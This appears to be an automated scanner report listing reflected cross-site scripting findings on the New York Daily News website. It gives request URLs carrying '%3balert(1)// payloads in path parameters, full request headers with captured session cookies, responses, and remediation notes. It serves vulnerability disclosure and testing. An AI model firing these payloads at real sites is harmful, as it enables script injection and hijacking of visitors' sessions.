GET /index.htmlabc66'%3balert(1)//14705d4d725 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:48 GMT Server: Apache Keep-Alive: timeout=3, max=994 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Set-Cookie: sto-id-sg-web-8080=CAACAKAK; Expires=Tue, 08-Feb-2011 18:26:19 GMT; Path=/ Content-Length: 70201
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14b06'%3balert(1)//36aeeedcf00 was submitted in the REST URL parameter 1. This input was echoed as 14b06';alert(1)//36aeeedcf00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /14b06'%3balert(1)//36aeeedcf00 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:35:26 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70062
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba63'%3balert(1)//c10bfc1ca5c was submitted in the REST URL parameter 1. This input was echoed as 7ba63';alert(1)//c10bfc1ca5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs7ba63'%3balert(1)//c10bfc1ca5c/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:27 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70077
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3747'%3balert(1)//44241014bc7 was submitted in the REST URL parameter 2. This input was echoed as d3747';alert(1)//44241014bc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs/index.htmld3747'%3balert(1)//44241014bc7 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:47 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70077
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfc7'%3b36d314d5bc6 was submitted in the REST URL parameter 1. This input was echoed as 5dfc7';36d314d5bc6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news5dfc7'%3b36d314d5bc6/national/2011/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:05 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70091
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d6d'%3b2d1c1a320fc was submitted in the REST URL parameter 2. This input was echoed as f2d6d';2d1c1a320fc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/nationalf2d6d'%3b2d1c1a320fc/2011/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:28 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70091
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2da5'%3bd4c2946b5b5 was submitted in the REST URL parameter 3. This input was echoed as f2da5';d4c2946b5b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011f2da5'%3bd4c2946b5b5/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:46 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f0e0'%3bbcdc394af78 was submitted in the REST URL parameter 4. This input was echoed as 7f0e0';bcdc394af78 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/027f0e0'%3bbcdc394af78/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:26:06 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed517'%3bac58ed0a047 was submitted in the REST URL parameter 5. This input was echoed as ed517';ac58ed0a047 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/02/08ed517'%3bac58ed0a047/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:26:46 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7c32'%3balert(1)//eb9ee865360 was submitted in the REST URL parameter 1. This input was echoed as a7c32';alert(1)//eb9ee865360 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa7c32'%3balert(1)//eb9ee865360/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:09 GMT Server: Apache Keep-Alive: timeout=3, max=998 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70312
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca83c'%3balert(1)//55db44aadf1 was submitted in the REST URL parameter 2. This input was echoed as ca83c';alert(1)//55db44aadf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/nationalca83c'%3balert(1)//55db44aadf1/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:10 GMT Server: Apache Keep-Alive: timeout=3, max=994 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70312
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14551'%3balert(1)//04c35b79461 was submitted in the REST URL parameter 3. This input was echoed as 14551';alert(1)//04c35b79461 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/201114551'%3balert(1)//04c35b79461/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:14 GMT Server: Apache Keep-Alive: timeout=3, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70312
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f8c1'%3balert(1)//a4dbf05e009 was submitted in the REST URL parameter 4. This input was echoed as 1f8c1';alert(1)//a4dbf05e009 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/021f8c1'%3balert(1)//a4dbf05e009/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:16 GMT Server: Apache Keep-Alive: timeout=3, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70312
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e6aa'%3balert(1)//794c4c0d2b8 was submitted in the REST URL parameter 5. This input was echoed as 4e6aa';alert(1)//794c4c0d2b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
